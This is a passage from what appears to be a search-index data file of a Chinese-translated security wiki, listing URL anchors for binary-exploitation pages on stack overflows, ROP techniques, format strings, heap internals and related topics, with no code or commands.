ck-binary-exploitation-methodology/tools/pwntools.html#pwn-调试","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-禁用-nx","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-disasm","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-elfdiff","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn
-hex","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-phd","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-pwnstrip","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-scrable","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-shellcraft","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-模板","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-unhex","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-更新","binary-exploitation/stack-overflow/index.html#stack-overflow","binary-exploitation/stack-overflow/index.html#什么是-stack-overflow","binary-exploitation/stack-overflow/index.html#查找-stack-overflows-偏移量","binary-exploitation/stack-overflow/index.html#利用-stack-overflows","binary-exploitation/stack-overflow/index.html#ret2win","binary-exploitation/stack-overflow/index.html#stack-shellcode","binary-exploitation/stack-overflow/index.html#windows-seh-based-exploitation-nsehseh","binary-exploitation/stack-overflow/index.html#rop--ret2-techniques","binary-exploitation/stack-overflow/index.html#heap-overflows","binary-exploitation/stack-overflow/index.html#types-of-protections","binary-exploitation/stack-overflow/index.html#real-world-example-cve-2025-40596-sonicwall-sma100","binary-exploitation/stack-overflow/index.html#真实案例cve-2025-23310--cve-2025-23311-nvidia-triton-inference-server","binary-exploitation/stack-overflow/index.html#参考资料","binary-exploitation/stack-overflow/pointer-redirecting.html#指针重定向","binary-exploitation/stack-overflow/pointer-redirecting.html#字符串指针","binary-exploitation/stack-overflow/pointer-redirecting.html#函数指针","binary-exploitation/stack-overflow/pointer-redirecting.html#参考","binary-exploitation/stack-overflow/ret2win/index.html#ret2win","binary-exploitation/stack-overflow/ret2win/in
dex.html#基本信息","binary-exploitation/stack-overflow/ret2win/index.html#c-示例","binary-exploitation/stack-overflow/ret2win/index.html#使用-pwntools-的-python-利用","binary-exploitation/stack-overflow/ret2win/index.html#保护措施","binary-exploitation/stack-overflow/ret2win/index.html#其他示例与参考","binary-exploitation/stack-overflow/ret2win/index.html#arm64-示例","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#ret2win---arm64","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#代码","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#aarch64-调用约定快速要点","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#寻找偏移量","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#模式选项","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#栈偏移选项","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#no-pie","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#常规","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#off-by-1","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#在启用-pie-时","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#off-by-2","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#notes-on-modern-aarch64-hardening-pacbti-and-ret2win","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#running-on-nonarm64-hosts-qemuuser-quick-tip","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#相关-hacktricks-页面","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#ret2syscall---arm64","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#参考资料","binary-exploitation/stack-overflow/stack-shellcode/index.html#stack-shellcode","binary-exploitation/stack-overflow/stack-shellcode/index.html#基本信息","binary-exploitation/stack-overflow/stack-shellcode/index.html#c-示例一个易受攻击的程序","binary-exploitation/stack-overflow/stack-shellcode/index.html#compilation","binary-exploitation/stack-overflow/stack-shellcode/index.html#python-exploit-using-pwntools","b
inary-exploitation/stack-overflow/stack-shellcode/index.html#windows-x64-bypass-nx-with-virtualalloc-rop-ret2stack-shellcode","binary-exploitation/stack-overflow/stack-shellcode/index.html#其他示例与参考","binary-exploitation/stack-overflow/stack-shellcode/index.html#参考","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#stack-shellcode---arm64","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#linux","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#代码","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#no-aslr--no-canary---stack-overflow","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#macos","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#stack-pivoting---ebp2ret---ebp-chaining","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#基本信息","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#ebp2ret","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#ebp-链接","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#ebp-可能未被使用","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#控制rsp的其他方法","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#pop-rsp小工具","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#xchg--rsp-gadget","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#jmp-esp","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#快速查找-pivot-gadgets","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#经典的透视阶段模式","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#现代缓解措施破坏堆栈透视cet阴影堆栈","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#arm64","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.h
tml#参考文献","binary-exploitation/stack-overflow/uninitialized-variables.html#未初始化变量","binary-exploitation/stack-overflow/uninitialized-variables.html#基本信息","binary-exploitation/stack-overflow/uninitialized-variables.html#示例","binary-exploitation/stack-overflow/uninitialized-variables.html#arm64-示例","binary-exploitation/rop-return-oriented-programing/index.html#rop---return-oriented-programing","binary-exploitation/rop-return-oriented-programing/index.html#基本信息","binary-exploitation/rop-return-oriented-programing/index.html#rop-的工作原理","binary-exploitation/rop-return-oriented-programing/index.html#工具","binary-exploitation/rop-return-oriented-programing/index.html#x86-示例中的-rop-链","binary-exploitation/rop-return-oriented-programing/index.html#x86-32位-调用约定","binary-exploitation/rop-return-oriented-programing/index.html#查找-gadgets","binary-exploitation/rop-return-oriented-programing/index.html#rop-链","binary-exploitation/rop-return-oriented-programing/index.html#rop-chain-in-x64-示例","binary-exploitation/rop-return-oriented-programing/index.html#x64-64位-调用约定","binary-exploitation/rop-return-oriented-programing/index.html#rop-链-1","binary-exploitation/rop-return-oriented-programing/index.html#栈对齐","binary-exploitation/rop-return-oriented-programing/index.html#x86-与-x64-的主要区别","binary-exploitation/rop-return-oriented-programing/index.html#arm64-示例中的-rop-chain","binary-exploitation/rop-return-oriented-programing/index.html#arm64-基础与调用约定","binary-exploitation/rop-return-oriented-programing/index.html#针对-rop-的保护","binary-exploitation/rop-return-oriented-programing/index.html#基于-rop-的技术","binary-exploitation/rop-return-oriented-programing/index.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#brop---blind-return-oriented-programming","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#基本信息","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programmi
ng.html#攻击","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#1-找到易受攻击的偏移--发送一个字符直到检测到服务器故障","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#2-暴力破解canary--以泄露它","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#3-暴力破解存储的rbp和rip--地址以泄露它们","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#4-找到停止小工具","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#5-找到brop小工具","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#6-找到plt","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#7-找到strcmp","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#8-找到write或等效函数","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#自动利用","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#参考文献","binary-exploitation/rop-return-oriented-programing/ret2csu.html#ret2csu","binary-exploitation/rop-return-oriented-programing/ret2csu.html#httpswwwscsstanfordedubropbittau-broppdf-基本信息","binary-exploitation/rop-return-oriented-programing/ret2csu.html#__libc_csu_init-中的魔法-gadgets","binary-exploitation/rop-return-oriented-programing/ret2csu.html#rdi-和-rsi","binary-exploitation/rop-return-oriented-programing/ret2csu.html#示例","binary-exploitation/rop-return-oriented-programing/ret2csu.html#使用调用","binary-exploitation/rop-return-oriented-programing/ret2csu.html#绕过调用并到达-ret","binary-exploitation/rop-return-oriented-programing/ret2csu.html#为什么不直接使用libc","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#ret2dlresolve","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#基本信息","binary-exploitation/rop-return-oriented-programing/ret2dlre
solve.html#攻击总结","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#示例","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#纯-pwntools","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#原始","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2esp--ret2reg","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2esp","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#缺乏空间","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#示例","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2reg","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#示例-1","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#arm64","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2sp","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2reg-1","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#protections","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#references","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#ret2lib","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#基本信息","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#示例步骤简化","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#查找地址","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#使用-gdb-peda--gef","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#使用-procmaps","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#未知的libc","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#通过2个偏移量识别libc","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#绕过32位的aslr","binary-exploitation/rop-retu
rn-oriented-programing/ret2lib/index.html#one-gadget","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#x86-ret2lib-代码示例","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#x64-ret2lib-代码示例","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#arm64-ret2lib-示例","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#ret-into-printf或-puts","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#ret2printf","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#使用-rop-泄露-libc-地址","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#快速概述","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#其他教程和二进制文件以供练习","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#代码","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#rop---泄露-libc-模板","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#1--查找偏移量","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#2--寻找-gadgets","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#3--查找-libc-库","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#31--搜索libc版本-1","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#32--搜索libc版本-2","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#33--其他泄露函数","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#4--查找基于-libc-地址并利用","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#42--使用-o
ne_gadget","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#exploit-file","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#常见问题","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#main_plt--elfsymbolsmain-未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#puts未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#sh-1-ssssssss-未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#泄露libc---模板","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#常见问题","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#main_plt--elfsymbolsmain-未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#puts未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#sh-1-ssssssss-未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.html#one-gadget","binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.html#基本信息","binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.html#arm64","binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.html#angry-gadget","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#ret2lib--printf-leak---arm64","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#ret2lib---nx-绕过与-rop-无-aslr","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#查找偏移量","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm6
4.html#x30-偏移量","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#查找-system-和-binsh-字符串","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#查找-gadgets","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#exploit","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#ret2lib---nx-asl--pie-绕过与来自栈的-printf-泄漏","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#pie-和-aslr-但没有-canary","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#printf-泄露","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#x30-偏移量-1","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#查找-gadgets-1","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#exploit-1","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#ret2syscall","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#基本信息","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#寄存器-gadgets","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#写字符串","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#可写内存","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#在内存中写入字符串","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#自动化-rop-链","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#缺少小工具","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#利用示例","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.html#r
et2syscall---arm64","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.html#代码","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.html#gadgets","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.html#利用","binary-exploitation/rop-return-oriented-programing/ret2vdso.html#ret2vdso","binary-exploitation/rop-return-oriented-programing/ret2vdso.html#基本信息","binary-exploitation/rop-return-oriented-programing/ret2vdso.html#arm64","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html#srop---sigreturn-oriented-programming","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html#基本信息","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html#示例","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#-tip","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#pwntools-示例","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#bof-示例","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#代码","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#exploit","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#bof-示例无需-sigreturn","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#代码-1","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#利用","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#自动查
找-sigreturn-gadgets-2023-2025","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#使用-rop-链接-srop通过-mprotect-进行转移","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#内核验证pac-和-shadow-stacks","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#参考文献","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#synology-patspk-加密档案解密","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#概述","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#1-获取档案","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#2-转储-pat-结构可选","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#3-提取-synology-解压库","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#4-恢复硬编码的密钥-get_keys","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#5-头结构与签名验证","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#6-派生每个归档的子密钥","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#7-synology的自定义--libarchive--后端","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#spk_read_header","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#spk_read_data","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#8-使用-synodecrypt-解密所有内容","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#9-常见陷阱","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#10-额外工具","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#参考文献","binary-exploitation/stack-overflow/windows-seh-overflow.htm
l#windows-基于-seh-的堆栈溢出利用-nsehseh","binary-exploitation/stack-overflow/windows-seh-overflow.html#finding-exact-offsets-nseh--seh","binary-exploitation/stack-overflow/windows-seh-overflow.html#choosing-a-pop-pop-ret-seh-gadget","binary-exploitation/stack-overflow/windows-seh-overflow.html#jump-back-technique-short--near-jmp","binary-exploitation/stack-overflow/windows-seh-overflow.html#坏字符","binary-exploitation/stack-overflow/windows-seh-overflow.html#shellcode-生成-x86","binary-exploitation/stack-overflow/windows-seh-overflow.html#delivering-over-http-precise-crlf--content-length","binary-exploitation/stack-overflow/windows-seh-overflow.html#工具","binary-exploitation/stack-overflow/windows-seh-overflow.html#注意事项与限制","binary-exploitation/stack-overflow/windows-seh-overflow.html#references","binary-exploitation/array-indexing.html#数组索引","binary-exploitation/array-indexing.html#基本信息","binary-exploitation/chrome-exploiting.html#chrome-exploiting","binary-exploitation/chrome-exploiting.html#1-chrome-架构回顾","binary-exploitation/chrome-exploiting.html#2-阶段-1--webassembly-类型混淆-cve-2025-0291","binary-exploitation/chrome-exploiting.html#3-第二阶段--逃离-v8-沙箱-issue-379140430","binary-exploitation/chrome-exploiting.html#4-stage-3--renderer--os-sandbox-escape-cve-2024-11114","binary-exploitation/chrome-exploiting.html#5-完整链流程","binary-exploitation/chrome-exploiting.html#6-实验室与调试设置","binary-exploitation/chrome-exploiting.html#收获","binary-exploitation/chrome-exploiting.html#参考","binary-exploitation/integer-overflow-and-underflow.html#integer-overflow","binary-exploitation/integer-overflow-and-underflow.html#基本信息","binary-exploitation/integer-overflow-and-underflow.html#最大值","binary-exploitation/integer-overflow-and-underflow.html#示例","binary-exploitation/integer-overflow-and-underflow.html#纯溢出","binary-exploitation/integer-overflow-and-underflow.html#signed-to-unsigned-conversion","binary-exploitation/integer-overflow-and-underflow.html#macos-溢出示例","binary-exploitation/integer-overflow-and-
underflow.html#macos-underflow-示例","binary-exploitation/integer-overflow-and-underflow.html#other-examples","binary-exploitation/integer-overflow-and-underflow.html#arm64","binary-exploitation/format-strings/index.html#format-strings","binary-exploitation/format-strings/index.html#基本信息","binary-exploitation/format-strings/index.html#访问指针","binary-exploitation/format-strings/index.html#arbitrary-read","binary-exploitation/format-strings/index.html#查找偏移","binary-exploitation/format-strings/index.html#有何用途","binary-exploitation/format-strings/index.html#arbitrary-write","binary-exploitation/format-strings/index.html#pwntools-模板","binary-exploitation/format-strings/index.html#format-strings-to-bof","binary-exploitation/format-strings/index.html#windows-x64-format-string-leak-to-bypass-aslr-no-varargs","binary-exploitation/format-strings/index.html#其他示例与参考","binary-exploitation/format-strings/index.html#参考资料","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#格式字符串---任意读取示例","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#读取二进制开始","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#代码","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#利用","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#读取密码","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#从栈中读取","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#读取数据","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#exploit","binary-exploitation/format-strings/format-strings-template.html#格式字符串模板","binary-exploitation/libc-heap/index.html#libc-heap","binary-exploitation/libc-heap/index.html#heap-basics","binary-exploitation/libc-heap/index.html#basic-chunk-allocation","binary-exploitation/libc-heap/index.html#arenas","binary-exploitation/libc-heap/index.html#subheaps","binary-exploitation/libc-heap/index.ht
ml#heap_info","binary-exploitation/libc-heap/index.html#malloc_state","binary-exploitation/libc-heap/bins-and-memory-allocations.html#bins--memory-allocations","binary-exploitation/libc-heap/bins-and-memory-allocations.html#基本信息","binary-exploitation/libc-heap/bins-and-memory-allocations.html#tcache每线程缓存bins","binary-exploitation/libc-heap/bins-and-memory-allocations.html#快速-bins","binary-exploitation/libc-heap/bins-and-memory-allocations.html#未排序的堆","binary-exploitation/libc-heap/bins-and-memory-allocations.html#小型桶","binary-exploitation/libc-heap/bins-and-memory-allocations.html#大型内存块","binary-exploitation/libc-heap/bins-and-memory-allocations.html#顶部块","binary-exploitation/libc-heap/bins-and-memory-allocations.html#最后剩余","binary-exploitation/libc-heap/bins-and-memory-allocations.html#分配流程","binary-exploitation/libc-heap/bins-and-memory-allocations.html#释放流程","binary-exploitation/libc-heap/bins-and-memory-allocations.html#堆函数安全检查","binary-exploitation/libc-heap/bins-and-memory-allocations.html#参考文献","binary-exploitation/libc-heap/heap-memory-functions/index.html#堆内存函数","binary-exploitation/libc-heap/heap-memory-functions/index.html","binary-exploitation/libc-heap/heap-memory-functions/free.html#free","binary-exploitation/libc-heap/heap-memory-functions/free.html#free-order-summary","binary-exploitation/libc-heap/heap-memory-functions/free.html#__libc_free","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free-开始","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free-tcache","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free-fast-bin","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free-finale","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free_merge_chunk","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#malloc--sysmalloc","binary-exploitation/libc-heap/heap-mem
ory-functions/malloc-and-sysmalloc.html#allocation-order-summary","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#__libc_malloc","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#_int_malloc","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#arena","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#fast-bin","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#小型空闲区","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#malloc_consolidate","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#未排序的堆","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#大块按索引","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#大块下一个更大","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#顶部块","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-开始","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-检查","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-不是主区域","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-主区域","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-主区域之前的错误-1","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-主区域继续","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-finale","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc_mmap","binary-exploitation/libc-heap/heap-memory-functions/unlink.html#unlink","binary-exploitation/libc-heap/heap-memory-functions/unlink.html#代码","binary-exploitation/libc-heap/heap-memory-func
tions/unlink.html#图形解释","binary-exploitation/libc-heap/heap-memory-functions/unlink.html#安全检查","binary-exploitation/libc-heap/heap-memory-functions/unlink.html#泄漏","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#heap-functions-security-checks","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#unlink","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_malloc","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#tcache_get_n","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#tcache_thread_shutdown","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#__libc_realloc","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_free","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_free_merge_chunk","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_free_create_chunk","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#do_check_malloc_state","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#malloc_consolidate","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_realloc","binary-exploitation/libc-heap/use-after-free/index.